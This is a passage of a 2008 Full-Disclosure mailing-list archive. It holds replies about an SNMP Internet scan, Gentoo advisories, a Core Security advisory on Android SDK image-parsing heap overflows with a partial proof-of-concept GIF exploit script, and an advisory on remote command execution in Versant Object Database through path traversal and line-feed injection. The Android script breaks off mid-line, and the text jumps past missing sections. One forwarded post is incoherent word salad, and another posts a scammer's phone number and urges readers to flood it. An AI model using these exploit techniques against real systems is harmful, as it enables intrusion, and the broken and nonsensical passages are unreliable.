vulnerabilities, it would make sense to focus on a type of device that is widely-spread through the Internet. I'll leave you guys to make your own observations by reading the results CSV file. The survey results file can be found on: http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/ * References * [1] http://www.google.com/search?num=100&hl=en&q=site%3Agnucitizen.org+%28embedded+devices%29+OR+upnp&btnG=Search [2] http://insecure.org/sploits/NT.smnp.domain_users.record_deletion.html [3] http://www.securityfocus.com/archive/1/366780 [4] http://www.phenoelit-us.org/stuff/HP_snmp.txt [5] http://www.securityfocus.com/bid/7001/exploit [6] http://www.procheckup.com/Hacking_ZyXEL_Gateways.pdf [7] http://www.arrisi.com/products/touchstone/index.asp [8] http://www.apple.com/airportexpress/ -- Adrian "pagvac" Pastor | gnucitizen.org From krahmer at suse.de Tue Mar 4 08:53:55 2008 From: krahmer at suse.de (Sebastian Krahmer) Date: Tue, 4 Mar 2008 09:53:55 +0100 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: References: Message-ID: <20080304085355.GA19264@suse.de> On Tue, Mar 04, 2008 at 12:02:25AM +0000, Adrian P wrote: > * Exploring the UNKNOWN: Scanning the Internet via SNMP! * > http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/ > > Hacking is not only about coming up with interesting solutions to > problems, but also about exploring the unknown. It was this drive for > knowledge philosophy that lead to surveying a significant sample of > the Internet which allowed us to make some VERY interesting > observations and get an idea of the current state of _remote SNMP > hacking_. > > * Why SNMP? * > > 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you > might be asking? Well, there are several reasons. First of all SNMP is > a UDP-based protocol which allows us to perform scanning at a much > shorter time than via TCP-based protocols. Another advantage of This is not true. I doubt there is any measurable advantage of UDP vs. TCP scans if you do it right. 2.5 million addresses can be done in a very short coffee break. Sebastian -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) From unknown.pentester at gmail.com Tue Mar 4 14:54:36 2008 From: unknown.pentester at gmail.com (Adrian P) Date: Tue, 4 Mar 2008 14:54:36 +0000 Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP! In-Reply-To: <20080304085355.GA19264@suse.de> References: <20080304085355.GA19264@suse.de> Message-ID: Well, such statement is simply derived from my personal experience of doing application-layer UDP scanning. Never ran a proper benchmark to compare speed results to be honest. On Tue, Mar 4, 2008 at 8:53 AM, Sebastian Krahmer wrote: > On Tue, Mar 04, 2008 at 12:02:25AM +0000, Adrian P wrote: > > > * Exploring the UNKNOWN: Scanning the Internet via SNMP! * > > http://www.gnucitizen.org/blog/exploring-the-unknown-scanning-the-internet-via-snmp/ > > > > Hacking is not only about coming up with interesting solutions to > > problems, but also about exploring the unknown. It was this drive for > > knowledge philosophy that lead to surveying a significant sample of > > the Internet which allowed us to make some VERY interesting > > observations and get an idea of the current state of _remote SNMP > > hacking_. > > > > * Why SNMP? * > > > > 2.5 million random IP addresses were surveyed via SNMP. Why SNMP you > > might be asking? Well, there are several reasons. First of all SNMP is > > a UDP-based protocol which allows us to perform scanning at a much > > shorter time than via TCP-based protocols. Another advantage of > This is not true. I doubt there is any measurable advantage > of UDP vs. TCP scans if you do it right. > 2.5 million addresses can be done in a very short coffee break. > > Sebastian > > > -- > ~ > ~ perl self.pl > ~ $_='print"\$_=\47$_\47;eval"';eval > ~ krahmer at suse.de - SuSE Security Team > ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) > > -- pagvac | gnucitizen.org From pdp.gnucitizen at googlemail.com Tue Mar 4 17:07:56 2008 From: pdp.gnucitizen at googlemail.com (Petko D. Petkov) Date: Tue, 4 Mar 2008 17:07:56 +0000 Subject: [Full-disclosure] like goolag but online Message-ID: <6905b1570803040907x1b249006qf610765e6a25f4c6@mail.gmail.com> cDc's goolag tool is pretty cool but here is an online alternative for those of you who are interested: http://www.gnucitizen.org/ghdb/ pdp -- http://www.gnucitizen.org http://www.gnucitizen.com GNUCITIZEN From advisories at coresecurity.com Tue Mar 4 18:26:56 2008 From: advisories at coresecurity.com (Core Security Technologies Advisories) Date: Tue, 04 Mar 2008 16:26:56 -0200 Subject: [Full-disclosure] CORE-2008-0124: Multiple vulnerabilities in Google's Android SDK Message-ID: <47CD9470.9040209@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs Multiple vulnerabilities in Google's Android SDK *Advisory Information* Title: Multiple vulnerabilities in Google's Android SDK Advisory ID: CORE-2008-0124 Advisory URL: http://www.coresecurity.com/?action=item&id=2148 Date published: 2008-03-04 Date of last update: 2008-03-04 Vendors contacted: Google Release mode: Coordinated release *Vulnerability Information* Class: Heap overflow, integer overflow Remotely Exploitable: No Locally Exploitable: No Bugtraq ID: 28006, 28005 CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 *Vulnerability Description* Android is project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007. The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing application and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5]. Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF an BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries other were introduced by native Android code that use them or that implements new functionality. Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates phone running the Android platform on an ARM microprocessor. This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit. *Vulnerable Packages* . Android SDK m3-rc37a and earlier are vulnerable several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). . Android SDK m5-rc14 is vulnerable to a security bug in the component that process BMP images (bug #3). *Non-vulnerable Packages* . Android SDK m5-rc15 *Vendor Information, Solutions and Workarounds* Vendor statement: "The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review." *Credits* These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega. *Technical Description / Proof of Concept Code* Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack. The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats. Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system. These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-start exploitation techniques for different hardware platforms and operating systems [6]. The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component. #1 - GIF image parsing heap overflow The Graphics Interchange Format (GIF) is image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage. A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the _Logical Screen Width and Height_ filed of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8]. Detailed analysis: When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats. Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image. First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and Height_ in a structure called 'GifFileType': /----------- Int DGifGetScreenDesc(GifFileType * GifFile) { ... /* Put the screen descriptor into the file: */ if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR || DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR) return GIF_ERROR; ... } - -----------/ We can see that the fields are stored in the first 2 words of the structure: /----------- typedef struct GifFileType { /* Screen dimensions. */ GifWord SWidth, SHeight, ... } - -----------/ In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register: /----------- .text:0002F234 BL _DGifOpen .text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5 - -----------/ Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size: /----------- Int DGifSlurp(GifFileType * GifFile) { ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height; sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType)); ... } - -----------/ Afterwards the _Logical Screen_ Width and Height are stored in the R9 and R11 registers: /----------- .text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight ! - -----------/ However the actual image may be much larger that these sizes that are incorrectly passed to a number of methods of the 'GIFImageDecoder': /----------- ImageDecoder::chooseFromOneChoice(): .text:0002F294 MOV R0, R8 .text:0002F298 MOV R1, #3 .text:0002F29C MOV R2, R9 .text:0002F2A0 MOV R3, R11 .text:0002F2A4 STR R12, [SP,#0x48+var_3C] .text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int) Bitmap::setConfig(): .text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap .text:0002F2BC MOV R1, #3 .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight ! .text:0002F2C4 MOV R3, R11 .text:0002F2C8 STR R10, [SP,#0x48+var_48] .text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint) - -----------/ This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet: /----------- .text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7 .text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8 .text:00035C40 MOV R4, R0 ; $R4 = *Bitmap - -----------/ And later: /----------- .text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint) .text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes .text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth .text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight .text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes - -----------/ The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once generated the GIF file, it must be opened in the Android browser to trigger the overflow: /----------- ##Android Heap Overflow ##Ortega Alfredo _ Core Security Exploit Writers Team ##tested against Android SDK m3-rc37a import Image import struct #Creates a _good_ gif image imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF') #Shrink the Logical screen dimension SWidth=1 SHeight=1 img = open(imagename,'rb').read() img = img[:6]+struct.pack('

- -----------/ Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff' it is very slow and the default memory configuration of Android will often abort the process before reaching the desired point. To overcome this limitation for demonstration purposes one can launch the emulator with this parameters: 'emulator -qemu -m 192' That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work. This security bug affects Android SDK m5-rc14 and earlier versions. *Report Timeline* . 2008-01-30: Vendor is notified that possibly exploitable vulnerabilities where discovered and that an advisory draft is available. This affects Android SDK m3-rc37a and earlier versions. . 2008-01-30: Vendor acknowledges and requests the draft. . 2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images. . 2008-01-31: Vendor acknowledges the draft. . 2008-02-02: Vendor notifies that the software is an early release for the open source community, but agree they can fix the problem on the estimated date (2008-02-25). . 2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library. . 2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory. . 2008-02-12: Core responds to vendor that all security issues found will be included in the advisory, the date is subject to coordination. . 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification. . 2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. . 2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been re-=scheduled for February 27th. 2008. . 2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon, priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues . . 2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page. . 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests for any additional comments or statements to be provided by noon March 3rd, 2008 (UTC-5) . 2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue. . 2008-03-02: Core agrees to delay publication for one day. . 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user which decreases the severity of the issues found . 2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges . 2008-03-04: Advisory CORE-2008-0124 is published. *References* [1] Android Overview - Open Handset Alliance - http://www.openhandsetalliance.com/android_overview.html [2] "Android Comes to Life in Barcelona" - The Washington Post , February 11th, 2008 - http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html [3] Android Developer Challenge - http://code.google.com/android/adc.html [4] "Test Center Preview: Inside Google's Mobile future" - Inforworld, Feb. 27th 2008 - http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html [5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th, 2008 http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html [6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. Wiley; 2nd edition (August 20, 2007) - http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html [7] Graphics Interchange Format version 89a - http://www.w3.org/Graphics/GIF/spec-gif89a.txt [8] Android downloads page http://code.google.com/p/android/downloads/list [9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/ [10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I teV3ahcSAUFEtsaRCeXVuN8= =u35s -----END PGP SIGNATURE----- From stuart at cyberdelix.net Tue Mar 4 19:23:14 2008 From: stuart at cyberdelix.net (lsi) Date: Tue, 04 Mar 2008 19:23:14 -0000 Subject: [Full-disclosure] lets go vishing Message-ID: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net> [19:15] lsi2lsi: hiya! ... so i was nearly vished today ... [19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB, if you are not [name], you must press 2 [19:16] lsi2lsi: if you ARE [name], please press 1 [19:17] lsi2lsi: ..etc.. i went to bank - they'd never heard of such a thing [19:17] lsi2lsi: fucking scammers [19:17] lsi2lsi: so its an automated thing - and it's called me 4 times today [19:17] lsi2lsi: i looked on the net - cant immediately find someone to shut down their 0845 number [19:18] lsi2lsi: if they call me a few more times, i might go to the cops [19:18] lsi2lsi: before that tho, i think i'll have some fun with their machine, and post the gory details onto the "full disclosure" list on the net (a security conference, global, unmoderated) [19:19] lsi2lsi: together with the num, so all my friends and colleagues can enjoy the machine as well [19:19] lsi2lsi: hopefully they will get hammered by some freak on the list [19:20] lsi2lsi: fucking scammers!!! [19:20] lsi2lsi: it's 0845-331-2320 if u want to play :) [19:20] lsi2lsi: could be lotsa fun .. ;) [19:21] lsi2lsi: in fact, im gonna post this whole thing to full disclosure right now.... that's +44-845-331-2320 for non-UK folks... --- Stuart Udall stuart at at cyberdelix.dot net - http://www.cyberdelix.net/ --- * Origin: lsi: revolution through evolution (192:168/0.2) From davidaitel at gmail.com Tue Mar 4 19:47:58 2008 From: davidaitel at gmail.com (Dave Aitel) Date: Wed, 5 Mar 2008 06:47:58 +1100 Subject: [Full-disclosure] [DailyDave] I like to read Message-ID: <8cedf8300803041147s4fddf89bj128107f3680fa62f@mail.gmail.com> [Forwarded from DailyDave] Tom Clancy just writes about how cool the Catholic religion is. His latest novel is all about someone trying to talk about format strings and buffer overflows, you can call them "fish." I've read Dawson's Creek novels that were better written. Now, telling the public the truth about RPC is that until you find out you've actually been owned at least he wrote about sex. Here's me preparing to RPC fuzz Exchange 2003. Does anyone see anything interesting in this industry? In a way, I think it's funny that there's a new binary, then you're stuck. But with Windows, even accessing a file or directory was present. Remotely, with no authentication. This is the secret to open source security. It's only until their payroll spreadsheets get posted to full disclosure that they get all outraged and start trying to resolve this issue for the art, and prevents stupid and harmful things like OIS from gaining traction. This isn't related to security in any way. Basically it was at all interesting, but there are people on this list off the companies. - -dave From aluigi at autistici.org Tue Mar 4 20:55:45 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Tue, 4 Mar 2008 21:55:45 +0100 Subject: [Full-disclosure] Arbitrary commands execution in Versant Object Database 7.0.1.3 Message-ID: <20080304215545.7d4bce93.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Versant Object Database http://www.versant.com/en_US/products/objectdatabase Versions: <= 7.0.1.3 Platforms: Windows, Solaris, HP-UX, AIX, Linux Bug: arbitrary commands execution Exploitation: remote Date: 04 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "The Versant Object Database is the market leader in object databases. Using Versant Object Database for data storage brings powerful advantages to applications that use complex C++ and Java object models, have high concurrency requirements, and large data sets. The Versant Object Database is designed to handle the navigational access, seamless data distribution, and enterprise scale often required by these applications." The Versand server is used also in other stand-alone products like, for example, Borland CaliberRM which naturally are vulnerables too. ####################################################################### ====== 2) Bug ====== VersantD is the service used for managing the Versant database and by default listens on port 5019 with the subsequent assigning of a new port after a client connects to it, so the client connects to port 5019 where is handled by the ss.exe process and after the initial exchange of data the connection continues on the new port. The first incredible thing which happens when a client connects is that the full paths which will be used by the server to launch the needed programs or locate the database files are passed directly by the same client. That means for example that if a client passes c:\folder in the VERSANT_ROOT field, the server will run (in case the "-utility" command is used) "c:\folder\bin\obe.exe -version 7.0.1 -dbtype + -nettype 2 -arch 11 -utility -soc 220 o_oscp" through the vs_prgExecAsync function. Then using a custom command value (at the place of the "-utility" showed before) beginning with the "..\" pattern for removing the "\bin\" folder added by the server forces it to execute not only a custom executable decided by the attacker but also any additional argument too. Naturally is also possible to execute remote commands not available on the server through, for example, the Windows shares simply using \\myhost\myfolder as path. So, resuming, through the Versant server an attacker can execute any local or remote custom command. The following is the full command-line executed through a custom command value (in my proof-of-concept there is the explanation of all the fields) with the parameters supplied by the client in upper case: "VERSANT_ROOT\bin\OUR_COMMAND OUR_ARGUMENTS -noprint -username VERSANT_USER -release VERSANT_REL -rootpath VERSANT_ROOT -dbpath VERSANT_DB -dbidpath VERSANT_DBID -dbidnode VERSANT_DBID_NODE DATABASE_NAME -posterrstk" It's enough to use a line-feed at the end of our arguments for dropping all the useless stuff which starts from "-noprint". Note: all the tests have been performed on the Windows version of the server so the exploitation could differ a bit on the other supported platforms. ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/versantcmd.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From py at gentoo.org Tue Mar 4 22:38:56 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Tue, 04 Mar 2008 23:38:56 +0100 Subject: [Full-disclosure] [ GLSA 200803-08 ] Win32 binary codecs: Multiple vulnerabilities Message-ID: <47CDCF80.700@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Win32 binary codecs: Multiple vulnerabilities Date: March 04, 2008 Bugs: #150288 ID: 200803-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in the Win32 codecs for Linux may result in the remote execution of arbitrary code. Background ========== Win32 binary codecs provide support for video and audio playback. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/win32codecs < 20071007-r2 >= 20071007-r2 Description =========== Multiple buffer overflow, heap overflow, and integer overflow vulnerabilities were discovered in the Quicktime plugin when processing MOV, FLC, SGI, H.264 and FPX files. Impact ====== A remote attacker could entice a user to open a specially crafted video file, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All Win32 binary codecs users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/win32codecs-20071007-r2" Note: Since no updated binary versions have been released, the Quicktime libraries have been removed from the package. Please use the free alternative Quicktime implementations within VLC, MPlayer or Xine for playback. References ========== [ 1 ] CVE-2006-4382 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4382 [ 2 ] CVE-2006-4384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4384 [ 3 ] CVE-2006-4385 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4385 [ 4 ] CVE-2006-4386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4386 [ 5 ] CVE-2006-4388 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4388 [ 6 ] CVE-2006-4389 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4389 [ 7 ] CVE-2007-4674 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4674 [ 8 ] CVE-2007-6166 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6166 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzc+AuhJ+ozIKI5gRAkBQAJ45BLSUrSDb21Ro/ZHEimwyzBpqqQCcD15e VpxOGmsa3V34PILWdYXqoXE= =70De -----END PGP SIGNATURE----- From ivanhec at gmail.com Tue Mar 4 21:57:00 2008 From: ivanhec at gmail.com (Ivan .) Date: Wed, 5 Mar 2008 08:57:00 +1100 Subject: [Full-disclosure] Hack into a Windows PC - no password needed Message-ID: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html From py at gentoo.org Tue Mar 4 23:03:04 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Wed, 05 Mar 2008 00:03:04 +0100 Subject: [Full-disclosure] [ GLSA 200803-09 ] Opera: Multiple vulnerabilities Message-ID: <47CDD528.1090907@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Opera: Multiple vulnerabilities Date: March 04, 2008 Bugs: #210260 ID: 200803-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in Opera, allowing for file disclosure, privilege escalation and Cross-Site scripting. Background ========== Opera is a fast web browser that is available free of charge. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/opera < 9.26 >= 9.26 Description =========== Mozilla discovered that Opera does not handle input to file form fields properly, allowing scripts to manipulate the file path (CVE-2008-1080). Max Leonov found out that image comments might be treated as scripts, and run within the wrong security context (CVE-2008-1081). Arnaud reported that a wrong representation of DOM attribute values of imported XML documents allows them to bypass sanitization filters (CVE-2008-1082). Impact ====== A remote attacker could entice a user to upload a file with a known path by entering text into a specially crafted form, to execute scripts outside intended security boundaries and conduct Cross-Site Scripting attacks. Workaround ========== There is no known workaround at this time. Resolution ========== All Opera users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/opera-9.26" References ========== [ 1 ] CVE-2008-1080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1080 [ 2 ] CVE-2008-1081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1081 [ 3 ] CVE-2008-1082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1082 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzdUouhJ+ozIKI5gRAqoGAJ47fARNyjNN6tMh5+16Hm2KBadmUQCeL+CN 2+oHbJ2FRiLnzJ5Ein7ta7E= =Lfy+ -----END PGP SIGNATURE----- From foojipe at gmail.com Tue Mar 4 23:33:27 2008 From: foojipe at gmail.com (jipe foo) Date: Wed, 5 Mar 2008 00:33:27 +0100 Subject: [Full-disclosure] Hack into a Windows PC - no 